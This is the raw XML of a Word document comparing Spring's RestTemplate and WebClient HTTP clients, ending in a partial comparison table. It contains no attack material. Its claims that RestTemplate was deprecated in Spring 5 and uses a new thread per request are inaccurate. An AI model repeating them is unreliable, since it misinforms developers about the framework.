        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68BFA687"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Used in </w:t>
      </w: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xml:space="preserve"> applications that require </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>non-blocking</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asynchronous</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> processing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B6464D5"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Suitable for </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>high-concurrency scenarios</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and applications that need to scale well, such as microservices or systems that consume a large number of API calls concurrently.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="757D0668"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3. Simplicity:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="586BCB7A"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stTemplate</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A69DF5D"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Simple and easy to use for standard, synchronous HTTP calls. It has been the default HTTP client for many years in Spring-based applications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AAAB6AC"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WebClient</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="522EADB0"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lightly more complex due to its reactive nature and its use of the reactive programming paradigm. However, it is more suitable for handling asynchronous requests and works well with Spring WebFlux.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63CA2488"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4. Thread Management:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CE86F50"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stTemplate</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C033E35"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Since it is blocking, it uses a new thread for each request. This can lead to </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>thread exhaustion</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in high-load systems with many concurrent requests, reducing scalability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0376518C"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WebClient</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D23169D"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Non-blocking</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and uses a </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>reactive thread pool</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to handle requests asynchronously. This means it can handle many more concurrent requests without exhausting threads, which leads to better scalability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76276C0F"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5. Error Handling:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6169725C"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stTemplate</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25551774"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tandard exception handling is used, and it is blocking, so you may have to deal with timeouts or retries in a synchronous manner.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C71836C"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WebClient</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39CBAE9C"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Provides advanced error handling with </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>reactive operators</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, such as onErrorResume, onErrorMap, etc., allowing you to handle failures in a more flexible and non-blocking manner.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55F6717C"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6. Streaming Support:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A6C8194"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stTemplate</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FB3FB4E"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Does not natively support streaming large responses (e.g., downloading large files) without blocking the thread.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16BCD8CC"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WebClient</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65D5CE71"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Supports </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>streaming</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> large responses or reading data in chunks. This is ideal when dealing with large files or continuous data, as it doesn't block the calling thread.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="565DB811"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7. Deprecation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="646B370B"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stTemplate</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="002B9D28"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Deprecated</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in Spring 5 and marked as </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>"no longer actively developed"</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in Spring WebFlux-based applications. While still functional, it is no longer recommended for new projects, especially in applications that require asynchronous or reactive programming.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2438BA2F"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WebClient</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F4B6ED3"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he </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>recommended</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> approach for making HTTP requests in </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>reactive Spring WebFlux applications</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and is expected to be the standard HTTP client moving forward.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BE75D08"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8. Performance:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75E8E793"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stTemplate</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0308F35C"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orks well for low-concurrency applications or small systems where synchronous behavior is fine. It can have performance bottlenecks when handling many concurrent requests due to thread blocking.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="096CB4C4"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WebClient</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A5F7A5B"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Offers better performance in high-concurrency situations because it is non-blocking and can handle more requests concurrently with fewer threads, making it more scalable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BE5B38A"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9. Support for Reactive Streams:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26259275"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stTemplate</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A70621E"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Not designed to support reactive streams or asynchronous handling. It works synchronously with HTTP requests.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1470DF4C"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WebClient</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49331FE4"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Fully supports </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>reactive streams</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Mono and Flux from Project Reactor), which allows you to compose asynchronous requests, apply backpressure, and handle large datasets efficiently.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="495B55A4"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0. API Design:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FF154A3"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stTemplate</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7848C5CE"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A traditional </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>imperative</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> API, with methods like getForObject(), postForObject(), exchange(), etc., that block until a response is received.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AD972D0"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WebClient</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23165C86" w14:textId="77777777" w:rsidR="00E32D56" w:rsidRPr="00B13F85" w:rsidRDefault="00E32D56"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A </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>reactive API</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, supporting methods like get(), post(), retrieve(), and exchange() that return reactive types (Mono, Flux), allowing you to chain operations and process responses asynchronously.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BE834AE" w14:textId="77777777" w:rsidR="00E32D56"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3C7614F">
          <v:rect id="_x0000_i2297" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0639D34D"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77"/>
        <w:gridCol w:w="3485"/>
        <w:gridCol w:w="4942"/>
      </w:tblGrid>
      <w:tr w:rsidR="00B13F85" w:rsidRPr="00B13F85" w14:paraId="1FA05241" w14:textId="77777777" w:rsidTr="00E32D56">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="736BED83"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lastRenderedPageBreak/>
              <w:t>Feature</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0E83B1CE"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RestTemplate</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6D48DF02"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WebClient</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B13F85" w:rsidRPr="00B13F85" w14:paraId="0B3106DA" w14:textId="77777777" w:rsidTr="00E32D56">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="64804B46"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Type of Operation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="28D49718"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ynchronous (blocking)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7EB54550"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synchronous (non-blocking)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B13F85" w:rsidRPr="00B13F85" w14:paraId="3A70C66D" w14:textId="77777777" w:rsidTr="00E32D56">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="72E0852D"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Used for</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2A620117"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raditional Spring MVC applications</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0CD09F02"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 WebFlux (reactive applications)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B13F85" w:rsidRPr="00B13F85" w14:paraId="3271C505" w14:textId="77777777" w:rsidTr="00E32D56">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="13790E01"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rror Handling</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="261AFE01"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tandard synchronous exceptions</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="748F2455"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active error handling with operators</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B13F85" w:rsidRPr="00B13F85" w14:paraId="1AF0A1D8" w14:textId="77777777" w:rsidTr="00E32D56">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="51A01945"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treaming Support</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="05F65EB6"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imited support for streaming</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="579C1C25"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upports streaming large responses</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B13F85" w:rsidRPr="00B13F85" w14:paraId="2F08CF07" w14:textId="77777777" w:rsidTr="00E32D56">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1C7D8C40"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oncurrency</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="177A303F"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orks with a single thread per request</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="45998ED1"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Can handle many concurrent requests without blocking</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B13F85" w:rsidRPr="00B13F85" w14:paraId="1C2B03C5" w14:textId="77777777" w:rsidTr="00E32D56">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7FFB16FB"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Deprecation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5EAD9A69"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Deprecated for new applications</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="45099878"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referred for new applications</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B13F85" w:rsidRPr="00B13F85" w14:paraId="683568B7" w14:textId="77777777" w:rsidTr="00E32D56">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="393C5DAE"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Performance</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5BE2B021"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ower in high-concurrency systems</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="228BCC9D"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Better performance with high concurrency</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B13F85" w:rsidRPr="00B13F85" w14:paraId="4E3B1350" w14:textId="77777777" w:rsidTr="00E32D56">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
